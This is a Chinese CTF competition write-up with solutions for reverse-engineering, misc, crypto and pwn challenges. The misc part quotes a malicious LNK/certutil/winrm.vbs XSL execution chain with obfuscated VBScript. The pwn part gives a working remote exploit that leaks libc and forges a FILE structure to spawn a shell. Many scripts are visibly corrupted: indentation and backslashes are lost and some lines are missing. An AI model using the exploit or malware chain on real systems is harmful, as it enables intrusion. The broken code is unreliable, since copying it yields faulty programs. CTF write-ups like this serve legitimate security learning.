• 欢迎光临~

# Reverse

## babyvm

vm签到题，这个题做完以后看到是一血人都傻了，看到easyvm已经三血开外了人就更傻了，明明应该baby比easy简单的吧

``````from idc_bc695 import *
l = [0x74, 0x03, 0x75, 0x01, 0xE8]
for i in range(len(l)):
if idc.get_wide_byte(addr + i) != l[i]:
break
else:
for i in range(len(l)):
print("[+] nop ok!!")
MakeUnkn(i, 0x90)
``````

（反汇编器模板在：myReverseExps/VMinterpreter.py at main · c10udlnk/myReverseExps，不过很久没改过了，每次都是做题的时候拉下来现改，有空再把新版放上去吧hhhh）

``````ins_set={ 0: [3, 2, "mov arr[r{0}], 0x{1:0>4X}"],
1: [3, 2, "mov r{0}, 0x{1:0>4X}"],
2: [3, 2, "mov r{0}, r{1}"],
3: [3, 2, "mov r{0}, arr[r{1}]"],
4: [3, 2, "mov arr[r{0}], r{1}"],
5: [3, 1, "push r{0}"],
6: [3, 1, "pop r{0}"],
7: [3, 2, "add r{0}, 0x{1:0>4X}"],
8: [3, 2, "add r{0}, r{1}"],
9: [3, 2, "sub r{0}, 0x{1:0>4X}"],
10: [3, 2, "sub r{0}, r{1}"],
11: [3, 2, "mul r{0}, 0x{1:0>4X}"],
12: [3, 2, "mul r{0}, r{1}"],
13: [3, 2, "shl r{0}, 0x{1:0>4X}"],
14: [3, 2, "shl r{0}, r{1}"],
15: [3, 2, "shr r{0}, 0x{1:0>4X}"],
16: [3, 2, "shr r{0}, r{1}"],
17: [3, 2, "xor r{0}, 0x{1:0>4X}"],
18: [3, 2, "xor r{0}, r{1}"],
19: [3, 2, "or r{0}, 0x{1:0>4X}"],
20: [3, 2, "or r{0}, r{1}"],
21: [3, 2, "and r{0}, 0x{1:0>4X}"],
22: [3, 2, "and r{0}, r{1}"],
23: [3, 1, "mov r{0}, getchar()"],
24: [3, 1, "putchar(r{0})"],
25: [3, 0, "exit"],
26: [3, 2, "cmp r{0}, 0x{1:0>4X}"],
27: [3, 2, "cmp r{0}, r{1}"],
28: [3, 1, "jz {0:0>3}"],
29: [3, 1, "jmp {0:0>3}"],
30: [3, 1, "jl {0:0>3}"],
31: [3, 1, "jnz {0:0>3}"]}
opcode = [18, 0, 0, 18, 1, 1, 18, 2, 2, 18, 3, 3, 18, 6, 6, 18, 7, 7, 1, 0, 105, 1, 1, 110, 1, 2, 112, 1, 3, 117, 1, 6, 116, 1, 7, 32, 24, 0, 18446744073709551615, 24, 1, 18446744073709551615, 24, 2, 18446744073709551615, 24, 3, 18446744073709551615, 24, 6, 18446744073709551615, 24, 7, 18446744073709551615, 1, 0, 102, 1, 1, 108, 1, 2, 97, 1, 3, 103, 1, 6, 58, 1, 7, 32, 24, 0, 18446744073709551615, 24, 1, 18446744073709551615, 24, 2, 18446744073709551615, 24, 3, 18446744073709551615, 24, 6, 18446744073709551615, 24, 7, 18446744073709551615, 18, 1, 1, 23, 0, 18446744073709551615, 5, 0, 18446744073709551615, 7, 1, 1, 26, 1, 38, 30, 31, 18446744073709551615, 25, 18446744073709551615, 18446744073709551615, 18, 2, 2, 0, 2, 255, 7, 2, 1, 0, 2, 547, 7, 2, 1, 0, 2, 571, 7, 2, 1, 0, 2, 567, 7, 2, 1, 0, 2, 567, 7, 2, 1, 0, 2, 587, 7, 2, 1, 0, 2, 555, 7, 2, 1, 0, 2, 251, 7, 2, 1, 0, 2, 555, 7, 2, 1, 0, 2, 547, 7, 2, 1, 0, 2, 591, 7, 2, 1, 0, 2, 239, 7, 2, 1, 0, 2, 567, 7, 2, 1, 0, 2, 239, 7, 2, 1, 0, 2, 591, 7, 2, 1, 0, 2, 591, 7, 2, 1, 0, 2, 547, 7, 2, 1, 0, 2, 547, 7, 2, 1, 0, 2, 571, 7, 2, 1, 0, 2, 567, 7, 2, 1, 0, 2, 255, 7, 2, 1, 0, 2, 563, 7, 2, 1, 0, 2, 563, 7, 2, 1, 0, 2, 563, 7, 2, 1, 0, 2, 567, 7, 2, 1, 0, 2, 587, 7, 2, 1, 0, 2, 563, 7, 2, 1, 0, 2, 591, 7, 2, 1, 0, 2, 555, 7, 2, 1, 0, 2, 555, 7, 2, 1, 0, 2, 587, 7, 2, 1, 0, 2, 239, 7, 2, 1, 25, 18446744073709551615, 18446744073709551615, 18, 2, 2, 3, 0, 2, 9, 0, 99, 4, 2, 0, 7, 2, 1, 26, 2, 32, 30, 1, 18446744073709551615, 25, 18446744073709551615, 18446744073709551615, 6, 0, 18446744073709551615, 26, 0, 125, 28, 18, 18446744073709551615, 1, 0, 119, 1, 1, 114, 1, 2, 111, 1, 3, 110, 1, 6, 103, 1, 7, 33, 24, 0, 18446744073709551615, 24, 1, 18446744073709551615, 24, 2, 18446744073709551615, 24, 3, 18446744073709551615, 24, 6, 18446744073709551615, 24, 7, 18446744073709551615, 1, 0, 10, 24, 0, 18446744073709551615, 25, 18446744073709551615, 18446744073709551615, 1, 8, 256, 26, 8, 225, 30, 25, 18446744073709551615, 6, 0, 18446744073709551615, 4, 8, 0, 9, 8, 1, 29, 19, 18446744073709551615, 6, 0, 18446744073709551615, 26, 0, 123, 31, 3, 18446744073709551615, 6, 0, 18446744073709551615, 26, 0, 103, 31, 3, 18446744073709551615, 6, 0, 18446744073709551615, 26, 0, 97, 31, 3, 18446744073709551615, 6, 0, 18446744073709551615, 26, 0, 108, 31, 3, 18446744073709551615, 6, 0, 18446744073709551615, 26, 0, 102, 31, 3, 18446744073709551615, 18, 9, 9, 1, 10, 225, 3, 7, 9, 3, 6, 10, 17, 6, 66, 13, 6, 2, 27, 6, 7, 31, 3, 18446744073709551615, 7, 9, 1, 7, 10, 1, 26, 9, 32, 30, 42, 18446744073709551615, 1, 0, 99, 1, 1, 111, 1, 2, 114, 1, 3, 114, 1, 6, 101, 1, 7, 99, 24, 0, 18446744073709551615, 24, 1, 18446744073709551615, 24, 2, 18446744073709551615, 24, 3, 18446744073709551615, 24, 6, 18446744073709551615, 24, 7, 18446744073709551615, 1, 0, 116, 1, 1, 108, 1, 2, 121, 1, 3, 33, 1, 6, 10, 24, 0, 18446744073709551615, 24, 1, 18446744073709551615, 24, 2, 18446744073709551615, 24, 3, 18446744073709551615, 24, 6, 18446744073709551615, 25, 18446744073709551615, 18446744073709551615]
pc = 0
base = 0x41E000
func_start = [0x41E000, 0x41E378, 0x41E9A8, 0x41EA68]
for i in range(len(func_start)):
func_start[i] = (func_start[i]-base) // 8
lstFunc = 0
while pc < len(opcode):
i = pc
pc += ins_set[opcode[i]][0]
if opcode[i] not in ins_set.keys():
print("[-] UknOpcode 0x{0:X} in addr 0x{1:0>8X}.n".format(opcode[i],i))
break
elif 28 <= opcode[i] <= 31:
res.append(ins_set[opcode[i]][2].format(opcode[i+1]*3)+'n')
else:
args=[]
for j in range(ins_set[opcode[i]][1]):
args.append(opcode[i+1+j])
res.append(ins_set[opcode[i]][2].format(*args)+'n')
if pc in func_start:
res.append('n')
lstFunc = pc

with open('res.txt', 'w') as f:
f.writelines(res)
``````

``````Addr    Code
;初始化寄存器，打印提示信息，接收flag并保存在栈上
000     xor r0, r0
003     xor r1, r1
006     xor r2, r2
009     xor r3, r3
012     xor r6, r6
015     xor r7, r7
018     mov r0, 0x0069
021     mov r1, 0x006E
024     mov r2, 0x0070
027     mov r3, 0x0075
030     mov r6, 0x0074
033     mov r7, 0x0020
036     putchar(r0)
039     putchar(r1)
042     putchar(r2)
045     putchar(r3)
048     putchar(r6)
051     putchar(r7)
054     mov r0, 0x0066
057     mov r1, 0x006C
060     mov r2, 0x0061
063     mov r3, 0x0067
066     mov r6, 0x003A
069     mov r7, 0x0020
072     putchar(r0)
075     putchar(r1)
078     putchar(r2)
081     putchar(r3)
084     putchar(r6)
087     putchar(r7)
090     xor r1, r1
093     mov r0, getchar()
096     push r0
102     cmp r1, 0x0026
105     jl 093
108     exit
;初始化已知数组
000     xor r2, r2
003     mov arr[r2], 0x00FF
009     mov arr[r2], 0x0223
015     mov arr[r2], 0x023B
021     mov arr[r2], 0x0237
027     mov arr[r2], 0x0237
033     mov arr[r2], 0x024B
039     mov arr[r2], 0x022B
045     mov arr[r2], 0x00FB
051     mov arr[r2], 0x022B
057     mov arr[r2], 0x0223
063     mov arr[r2], 0x024F
069     mov arr[r2], 0x00EF
075     mov arr[r2], 0x0237
081     mov arr[r2], 0x00EF
087     mov arr[r2], 0x024F
093     mov arr[r2], 0x024F
099     mov arr[r2], 0x0223
105     mov arr[r2], 0x0223
111     mov arr[r2], 0x023B
117     mov arr[r2], 0x0237
123     mov arr[r2], 0x00FF
129     mov arr[r2], 0x0233
135     mov arr[r2], 0x0233
141     mov arr[r2], 0x0233
147     mov arr[r2], 0x0237
153     mov arr[r2], 0x024B
159     mov arr[r2], 0x0233
165     mov arr[r2], 0x024F
171     mov arr[r2], 0x022B
177     mov arr[r2], 0x022B
183     mov arr[r2], 0x024B
189     mov arr[r2], 0x00EF
195     exit
;对已知数组进行-63处理
000     xor r2, r2
003     mov r0, arr[r2]
006     sub r0, 0x0063
009     mov arr[r2], r0
015     cmp r2, 0x0020
018     jl 003
021     exit
;比较flag的格式是否为"flag{}"，flag顺序存在已知数组后面的一段内存中，从头遍历进行xor 0x42和左移2处理
000     pop r0
003     cmp r0, 0x007D
006     jz 054
009     mov r0, 0x0077
012     mov r1, 0x0072
015     mov r2, 0x006F
018     mov r3, 0x006E
021     mov r6, 0x0067
024     mov r7, 0x0021
027     putchar(r0)
030     putchar(r1)
033     putchar(r2)
036     putchar(r3)
039     putchar(r6)
042     putchar(r7)
045     mov r0, 0x000A
048     putchar(r0)
051     exit
054     mov r8, 0x0100
057     cmp r8, 0x00E1
060     jl 075
063     pop r0
066     mov arr[r8], r0
069     sub r8, 0x0001
072     jmp 057
075     pop r0
078     cmp r0, 0x007B
081     jnz 009
084     pop r0
087     cmp r0, 0x0067
090     jnz 009
093     pop r0
096     cmp r0, 0x0061
099     jnz 009
102     pop r0
105     cmp r0, 0x006C
108     jnz 009
111     pop r0
114     cmp r0, 0x0066
117     jnz 009
120     xor r9, r9
123     mov r10, 0x00E1
126     mov r7, arr[r9]
129     mov r6, arr[r10]
132     xor r6, 0x0042
135     shl r6, 0x0002
138     cmp r6, r7
141     jnz 009
150     cmp r9, 0x0020
153     jl 126
156     mov r0, 0x0063
159     mov r1, 0x006F
162     mov r2, 0x0072
165     mov r3, 0x0072
168     mov r6, 0x0065
171     mov r7, 0x0063
174     putchar(r0)
177     putchar(r1)
180     putchar(r2)
183     putchar(r3)
186     putchar(r6)
189     putchar(r7)
192     mov r0, 0x0074
195     mov r1, 0x006C
198     mov r2, 0x0079
201     mov r3, 0x0021
204     mov r6, 0x000A
207     putchar(r0)
210     putchar(r1)
213     putchar(r2)
216     putchar(r3)
219     putchar(r6)
222     exit
``````

``````arr = [0x00FF, 0x0223, 0x023B, 0x0237, 0x0237, 0x024B, 0x022B, 0x00FB, 0x022B, 0x0223, 0x024F, 0x00EF, 0x0237, 0x00EF, 0x024F, 0x024F, 0x0223, 0x0223, 0x023B, 0x0237, 0x00FF, 0x0233, 0x0233, 0x0233, 0x0237, 0x024B, 0x0233, 0x024F, 0x022B, 0x022B, 0x024B, 0x00EF]
for i in range(len(arr)):
arr[i] -= 0x0063
arr[i] >>= 0x2
arr[i] ^= 0x0042
arr[i] = chr(arr[i])

print(''.join(arr))
``````

flag：e247780d029a7a992247e6667869008a

## easyvm

idapython去花，好像还有一两个零散的花指令来着，不太记得了（

``````from idc_bc695 import *
l = [0x0F, 0x84, 0x07, 0x00, 0x00, 0x00, 0x0F, 0x85, 0x01, 0x00, 0x00, 0x00, 0xE8]
for i in range(len(l)):
if idc.get_wide_byte(addr + i) != l[i]:
break
else:
for i in range(len(l)):
print("[+] nop ok!!")
MakeUnkn(i, 0x90)
``````

sub_4011E0是base64魔改，魔改为在结果xor了0x0A0B0C0D

vm摁逆，已知数组在unk_40B050，opcode在unk_40B030

``````ins_set={0xC0: [1, 0, "inc r1"],
0xC1: [1, 0, "inc r2"],
0xC2: [1, 0, "inc r3"],
0xC3: [1, 0, "mov r1, r2"],
0xC4: [1, 0, "mov r1, r3"],
0xC5: [1, 0, "mov r2, r1"],
0xC6: [1, 0, "mov r2, r3"],
0xC7: [1, 0, "mov r3, r1"],
0xC8: [1, 0, "mov r3, r2"],
0xC9: [5, 4, "mov r1, 0x{3:0>2X}{2:0>2X}{1:0>2X}{0:0>2X}"],
0xCA: [5, 4, "mov r2, 0x{3:0>2X}{2:0>2X}{1:0>2X}{0:0>2X}"],
0xCB: [5, 4, "mov r3, 0x{3:0>2X}{2:0>2X}{1:0>2X}{0:0>2X}"],
0xCC: [1, 0, "mov r1, input[r3]"],
0xCD: [1, 0, "mov r2, input[r3]"],
0xCE: [1, 0, "xor r1, r2"],
0xCF: [1, 0, "xor r2, r1"],
0xD0: [1, 0, "cmp r1, data[r3]"], # a==b:1    a>b:2    a<b:0
0xD1: [1, 0, "cmp r2, data[r3]"],
0xD2: [5, 4, "cmp r3, 0x{3:0>2X}{2:0>2X}{1:0>2X}{0:0>2X}"],
0xD3: [2, 1, "jz {0:0>4}"], # == 1
0xD4: [2, 1, "jnz {0:0>4}"], # == 0
0xFE: [1, 0, "; wrong"],
0xFF: [1, 0, "; right"]}
opcode = [0xCA, 0x00, 0x00, 0x00, 0x00, 0xCB, 0x00, 0x00, 0x00, 0x00, 0xCC, 0xCF, 0xC9, 0xEE, 0x00, 0x00, 0x00, 0xCF, 0xD1, 0xD3, 0x01, 0xFE, 0xC2, 0xD2, 0x39, 0x00, 0x00, 0x00, 0xD4, 0xEC, 0xFF]
pc = 0
while pc < len(opcode):
i = pc
pc += ins_set[opcode[i]][0]
if opcode[i] not in ins_set.keys():
print("[-] UknOpcode 0x{0:X} in addr 0x{1:0>8X}.n".format(opcode[i],i))
break
elif opcode[i] in [0xD3, 0xD4]:
jmpdelta = opcode[i+1] if opcode[i+1] & 0x80 == 0 else opcode[i+1] - 256
res.append(ins_set[opcode[i]][2].format(pc + jmpdelta)+'n')
else:
args=[]
for j in range(ins_set[opcode[i]][1]):
args.append(opcode[i+1+j])
res.append(ins_set[opcode[i]][2].format(*args)+'n')

with open('res.txt', 'w') as f:
f.writelines(res)
``````

``````Addr    Code
0000    mov r2, 0x00000000
0005    mov r3, 0x00000000
0010    mov r1, input[r3]
0011    xor r2, r1
0012    mov r1, 0x000000EE
0017    xor r2, r1
0018    cmp r2, data[r3]
0019    jz 0022
0021    ; wrong
0022    inc r3
0023    cmp r3, 0x00000039
0028    jnz 0010
0030    ; right
``````

``````import base64

data = [0xBE, 0x36, 0xAC, 0x27, 0x99, 0x4F, 0xDE, 0x44, 0xEE, 0x5F, 0xDA, 0x0B, 0xB5, 0x17, 0xB8, 0x68, 0xC2, 0x4E, 0x9C, 0x4A, 0xE1, 0x43, 0xF0, 0x22, 0x8A, 0x3B, 0x88, 0x5B, 0xE5, 0x54, 0xFF, 0x68, 0xD5, 0x67, 0xD4, 0x06, 0xAD, 0x0B, 0xD8, 0x50, 0xF9, 0x58, 0xE0, 0x6F, 0xC5, 0x4A, 0xFD, 0x2F, 0x84, 0x36, 0x85, 0x52, 0xFB, 0x73, 0xD7, 0x0D, 0xE3]
data = [0] + data
tmp = []
for i in range(1, len(data)):
tmp.append(data[i-1] ^ 0xEE ^ data[i])

flag = ""
arr = [0xA, 0xB, 0xC, 0xD]
pos = 0
for x in tmp:
flag += chr(tmp[pos] ^ arr[pos%4])
pos += 1
print(flag)
print(base64.b64decode(flag.encode()))
``````

## babyre

• (x|y)-(x|y) == x - y
• (x&y)-(x&y) == x - y
• (x&y)+(x&y) == x ^ y
• (x&y)|(x&y) == x ^ y
• x|y+x|y-x-y == x ^ y
• (y|~x)|(y^x) == x | y

``````arr = [0 for _ in range(4)]
for i in range(len(s)):
arr[i%4] ^= s[i]
for i in range(len(s)):
s[i] ^= arr[i%4]
``````

xor的数据在var_31 var_32 var_33，同样可以看汇编往上追溯

``````for i in range(3, len(s), 3):
tmp = [s[i-3]>>2, ((s[i-2]>>4)|(~(~s[i-3]|0xfc)<<4))&0xff, ((s[i-1]>>6)|((s[i-2]&(s[i-2]^0xF0))<<2))&0xff]
for j in range(i, len(s)):
s[j] ^= tmp[j%3]
``````

``````import base64

s = "Fi9X/fxX6Q6JBfUfBM1V/y6V6PcPjMaQLl9IuttFuH68"
# s = "aJW31v1YF9nucbsFYGp2/XtrIO8tUi7oBX1CYmVVuGZ0"
# s = "BGpvCSXOIOUgBOp0Uofm1PZh1Msa4YVaS81UmWHchtr"
# s = "1Of0LdCt6iVW/M6x1dc0LOPz6lYp/t9e1Of0LdCt6iQ1"

myTable  = "QVEJAfHmUYjBac+u8Ph5n9Od16FrICL/X0GvtM4qk7T2z3wNSsyoebilxWKgZpRD"
b64table = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
s = list(base64.b64decode(s.translate(str.maketrans(myTable,b64table)).encode()))
# print(bytes(s))

# s = list("qwertyuiopasdfghjklzxcvbnm123456")
# s = "abcdefghijklmnopqrstuvwxyz012345"
# s = list("aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa")

# arr = [0 for _ in range(4)]
# for i in range(len(s)):
#     arr[i%4] ^= s[i]
# for i in range(len(s)):
#     s[i] ^= arr[i%4]

# for i in range(3, len(s), 3):
#     tmp = [s[i-3]>>2, ((s[i-2]>>4)|(~(~s[i-3]|0xfc)<<4))&0xff, ((s[i-1]>>6)|((s[i-2]&(s[i-2]^0xF0))<<2))&0xff]
#     for j in range(i, len(s)):
#         s[j] ^= tmp[j%3]
# print(bytes(s))

s2 = s.copy()
for i in range(3, len(s), 3):
tmp = [s[i-3]>>2, ((s[i-2]>>4)|(~(~s[i-3]|0xfc)<<4))&0xff, ((s[i-1]>>6)|((s[i-2]&(s[i-2]^0xF0))<<2))&0xff]
for j in range(i, len(s)):
s2[j] ^= tmp[j%3]
s2 = s2[:-1] # 最后多了一位填充
# print(bytes(s2))

arr = [0 for _ in range(4)]
for i in range(len(s2)):
arr[i%4] ^= s2[i]
for i in range(len(s2)):
s2[i] ^= arr[i%4]
print(bytes(s2))
``````

flag：fce5e3dfc6db4f808ccaa6fcffecf583

# Misc

`WindowsSystem32cmd.exe /c copy "20200308-sitrep-48-covid-19.pdf.lnk" %tmp%\g4ZokyumBB2gDn.tmp /y&for /r C:\Windows\System32\ %i in (*ertu*.exe) do copy %i %tmp%\msoia.exe /y&findstr.exe "TVNDRgAAAA" %tmp%\g4ZokyumBB2gDn.tmp>%tmp%\cSi1r0uywDNvDu.tmp&%tmp%\msoia.exe -decode %tmp%\cSi1r0uywDNvDu.tmp %tmp%\oGhPGUDC03tURV.tmp&expand %tmp%\oGhPGUDC03tURV.tmp -F:* %tmp% &wscript %tmp%\9sOXN6Ltf0afe7.js`

``````var e7926b8de13327f8e703624e = new ActiveXObject("WScript.Shell");
e7926b8de13327f8e703624e.Run ("cmd /c mkdir %tmp%\cscript.exe&for /r C:\Windows\System32\ %m in (cscr*.exe) do copy %m %tmp%\cscript.exe\msproof.exe /y&move /Y %tmp%\cSi1r0uywDNvDu.tmp %tmp%\cscript.exe\WsmPty.xsl&%tmp%\cscript.exe\msproof.exe //nologo %windir%\System32\winrm.vbs get wmicimv2/Win32_Process?Handle=4 -format:pretty&del "%tmp%\cscript.exe\WsmPty.xsl" /f /q&"%tmp%\20200308-sitrep-48-covid-19.pdf"",0);
``````

``````<?xml version='1.0'?>
<stylesheet
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
xmlns:user="placeholder"
version="1.0">
<output method="text"/>
<ms:script implements-prefix="user" language="VBScript">
<![CDATA[
rBOH7OLTCVxzkH=HrtvBsRh3gNUbe("676d60667a64333665326564333665326564333665326536653265643336656564333665327c"):execute(rBOH7OLTCVxzkH):function HrtvBsRh3gNUbe(bhhz6HalbOkrki):for rBOH7OLTCVxzkH=1 to len(bhhz6HalbOkrki)step 2:HrtvBsRh3gNUbe=HrtvBsRh3gNUbe&chr(asc(chr("&h"&mid(bhhz6HalbOkrki,rBOH7OLTCVxzkH,2)))xor 1):next:end function:
]]> </ms:script>
</stylesheet>
``````

VBscript的关键点在：

• "aaa" & "bbb" == "aaabbb"，这里&是连接符的意思，相当于python里字符串之间的+
• "&h41"实际上就是python里的"x41"，所以这里chr("&h"&mid(bhhz6HalbOkrki,rBOH7OLTCVxzkH,2))是取两位然后unhex（内置函数的作用自行搜索）
• VB里面异或就写成xor是我没想到的（逃

``````s = bytes.fromhex("676d60667a64333665326564333665326564333665326536653265643336656564333665327c")
flag = ""
for x in s:
flag += chr(x ^ 1)
print(flag)
``````

flag：e27d3de27d3de27d3d7d3de27dde27d3

## gogogo

`volatility -f 2.raw --profile=WinXPSP2x86 dumpfiles -Q 0x0000000002182dc0 -D ./ -u`

`foremost csgo.png`解出来两张图

（赛后听凌邪师傅说枪的“阿兹特克”就是指这个Aztec，人傻了.jpg）

flag：fbab8380-a642-48aa-89b1-8e251f826b12

## TimeTravel

ooo000粗略的看起来是一个base64，sub_4AE8有一点混淆，通过调用的分析和一些典型操作（比如初始化s盒、xor，那几个图里已命名的函数）能大概看出来是个魔改rc4，从xor操作看出除了正常的rc4异或以外还异或了当前的序号。比较的v17是已知数组off_17180。

ooo000的魔改在取数的时候取的是x^(x>>3)而不是x

invshift是以前比赛中用过的对x^(x>>3)算法的逆向函数（一招鲜吃遍天了属于是

``````from hashlib import md5
from arc4 import ARC4
import base64

def bf(s):
s = s.lower()
charset = "0123456789abcdef"
for a in charset:
for b in charset:
for c in charset:
for d in charset:
for e in charset:
tmps = a + b + c + d + e
if md5(tmps.encode()).hexdigest() == s:
return tmps

res = bf("1F862D87DB3293B81C7D2935477A22EA") #手动将4和5，E和F进行替换
dst = [0x000000A8, 0x000000CE, 0x000000CE, 0x000000D7, 0x000000B1, 0x0000005A, 0x00000020, 0x0000004B, 0x000000AB, 0x000000A2, 0x00000023, 0x000000FA, 0x000000FC, 0x000000F0, 0x000000DF, 0x000000A5, 0x000000B4, 0x00000077, 0x000000E6, 0x00000041, 0x000000C4, 0x00000065, 0x00000084, 0x00000091, 0x0000008B, 0x0000000A, 0x000000E6, 0x000000AE, 0x000000BB, 0x000000B5, 0x00000037, 0x000000FD, 0x000000C0, 0x000000CB, 0x00000072, 0x00000078, 0x00000013, 0x00000091, 0x000000D3, 0x0000005E]
keytable = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"[::-1]
key = []
v1 = -2078209981
for i in range(256):
v13 = ((v1 * i) >> 32) + i
v14 = (v13 >> 5) + (v13 >> 31)
if i - 62*v14 < 0:
print(i, i - 62*v14)
key.append(keytable[i - 62 * v14])

key = ''.join(key).encode()
dst = bytes(dst)
rc4 = ARC4(key)
RC4ans = rc4.encrypt(dst)
src = []
for i in range(len(RC4ans)):
src.append(RC4ans[i] ^ i)
src = bytes(src).decode()

table = "ZO6Kq79L&CPWvNopzQfghDRSG@di*kAB8rsFewxlm+/u5a^2YtTJUVEn0\$HI34y#"
tmp = []
for x in src:
if x == '=':
break
tmp.append(table.index(x))

def invshift(m, k, c):
revm = 0
if k < 0:
k = -k
cnt = 0
while cnt < 64:
hk = (revm << (64 - k)) & 0xffffffffffffffff
tmp = (hk & c) ^ m
revm = (revm << k) + (tmp >> (64 - k))

m = (m << k) & 0xffffffffffffffff
c = (c << k) & 0xffffffffffffffff
cnt += k
return revm >> (cnt - 64)
else:
cnt = 0
while cnt < 64:
lk = revm >> cnt
tmp = ((lk & c) ^ m) & ((1 << k) - 1)
revm = (tmp << (cnt + k)) + revm
m = m >> k
c = c >> k
cnt += k
return (revm >> k) & 0xffffffffffffffff

ans = ""
for x in tmp:
ans += bin(invshift(x, -3, 0x3f))[2:].rjust(6, '0')
flag = ""
for i in range(0, len(ans), 8):
flag += chr(int(ans[i:i+8], 2))

flag = 'e25' + res + flag
print(flag)
``````

flag：e25be952-e74b-4649-bc0d-236342079a59

# Crypto

## babyrsa

``````e = 2199344405076718723439776106818391416986774637417452818162477025957976213477191723664184407417234793814926418366905751689789699138123658292718951547073938244835923378103264574262319868072792187129755570696127796856136279813658923777933069924139862221947627969330450735758091555899551587605175567882253565613163972396640663959048311077691045791516671857020379334217141651855658795614761069687029140601439597978203375244243343052687488606544856116827681065414187957956049947143017305483200122033343857370223678236469887421261592930549136708160041001438350227594265714800753072939126464647703962260358930477570798420877
p = 98197216341757567488149177586991336976901080454854408243068885480633972200382596026756300968618883148721598031574296054706280190113587145906781375704611841087782526897314537785060868780928063942914187241017272444601926795083433477673935377466676026146695321415853502288291409333200661670651818749836420808033
q = 133639826298015917901017908376475546339925646165363264658181838203059432536492968144231040597990919971381628901127402671873954769629458944972912180415794436700950304720548263026421362847590283353425105178540468631051824814390421486132775876582962969734956410033443729557703719598998956317920674659744121941513
c = 1492164290534197296766878830710549288168716657792979479408332026408553210558539364503279432780006256047888761718878241924947937039103166564146378209168719163067531460700424309878383312837345239570897122826051628153030129647363574035072755426112229160684859510640271933580581310029921376842631120847546030843821787623965614564745724229763999106839802052036834811357341644073138100679508864747009014415530176077648226083725813290110828240582884113726976794751006967153951269748482024859714451264220728184903144004573228365893961477199925864862018084224563883101101842275596219857205470076943493098825250412323522013524
N = p*q
print(N == 13123058934861171416713230498081453101147538789122070079961388806126697916963123413431108069961369055630747412550900239402710827847917960870358653962948282381351741121884528399369764530446509936240262290248305226552117100584726616255292963971141510518678552679033220315246377746270515853987903184512948801397452104554589803725619076066339968999308910127885089547678968793196148780382182445270838659078189316664538631875879022325427220682805580410213245364855569367702919157881367085677283124732874621569379901272662162025780608669577546548333274766058755786449491277002349918598971841605936268030140638579388226573929)

phi = (p-1) * (q-1)
d = inverse_mod(e, phi)
print(pow(c, d, N))
``````

flag：01d_Curs3_c4Me_Again

hour我直接大胆猜测是4，前面看到有特判

min和sec没看到特判，但是60*60的空间完全可以爆破

flag就可以出来了，爆破分秒写exp：（其实感觉这题才应该叫TimeTravel才对= =只能在特定时间拿到flag嘛）

``````from hashlib import md5

xorarr = [6, 28, 1, 19, 27, 5, 29]
for i in range(len(xorarr)):

hashstr_8_23 = "1a9852e856816224"
h = str(4)
for m in range(60):
for s in range(60):
if md5(flag.encode()).hexdigest()[8:24] == hashstr_8_23:
print(flag)
``````

flag：80d0169d22da3c35

# PWN

## 送分题

https://www.anquanke.com/post/id/258512（justpwnit），直接打wp的exp打通了（

``````from pwn import *
# from LibcSearcher import *
# context.log_level='debug'
# debug = 1
file_name = './pwn'
# libc_name = '/lib/x86_64-linux-gnu/libc.so.6'
libc_name = './libc-2.27.so'
ip = '1.13.162.249'
prot = '10001'
# if debug:
# r = process(file_name)
# libc = ELF(libc_name)
# else:
r = remote(ip,int(prot))
libc = ELF(libc_name)

# def debug():
#     gdb.attach(r)
#     raw_input()

def pack_file(_flags = 0,
_IO_write_base = 0,
_IO_write_ptr = 0,
_IO_write_end = 0,
_IO_buf_base = 0,
_IO_buf_end = 0,
_IO_save_base = 0,
_IO_backup_base = 0,
_IO_save_end = 0,
_IO_marker = 0,
_IO_chain = 0,
_fileno = 0,
_lock = 0,
_wide_data = 0,
_mode = 0):
file_struct = p32(_flags) +
p32(0) +
p64(_IO_write_base) +
p64(_IO_write_ptr) +
p64(_IO_write_end) +
p64(_IO_buf_base) +
p64(_IO_buf_end) +
p64(_IO_save_base) +
p64(_IO_backup_base) +
p64(_IO_save_end) +
p64(_IO_marker) +
p64(_IO_chain) +
p32(_fileno)
file_struct = file_struct.ljust(0x88, "x00")
file_struct += p64(_lock)
file_struct = file_struct.ljust(0xa0, "x00")
file_struct += p64(_wide_data)
file_struct = file_struct.ljust(0xc0, 'x00')
file_struct += p64(_mode)
file_struct = file_struct.ljust(0xd8, "x00")
return file_struct

file = ELF(file_name)
sl = lambda x : r.sendline(x)
sd = lambda x : r.send(x)
sla = lambda x,y : r.sendlineafter(x,y)
rud = lambda x : r.recvuntil(x,drop=True)
ru = lambda x : r.recvuntil(x)
li = lambda name,x : log.info(name+':'+hex(x))
ri = lambda  : r.interactive()
ru('Now you can get a big box, what size?')
sl(str(0x1430))
ru('Now you can get a bigger box, what size?')
sl(str(0x5000))
ru('Do you want to rename?(y/n)')
sl('y')
main_arena = u64(r.recv(6) + 'x00x00')
li("main_arena",main_arena)
libc_base = main_arena-0x3ebca0
system = libc_base+libc.symbols['system']
global_max_fast = libc_base+0x3ed940
IO_list_all = libc_base + libc.symbols['_IO_list_all']
IO_str_jumps = 0x3e8360 + libc_base
binsh = 0x00000000001b40fa + libc_base
# debug()
ru("Do you want to edit big box or bigger box?(1:big/2:bigger)n")
sl("1")
ru(':n')
_IO_write_base=0,
_IO_write_ptr=1,
_IO_buf_base=binsh,
_mode=0,)
fake_file += p64(IO_str_jumps-8)+p64(0)+p64(system)
sl(fake_file[0x10:])
ri()
``````

flag：5hen_m3_5hi_kuai_1e_xin9_Qiu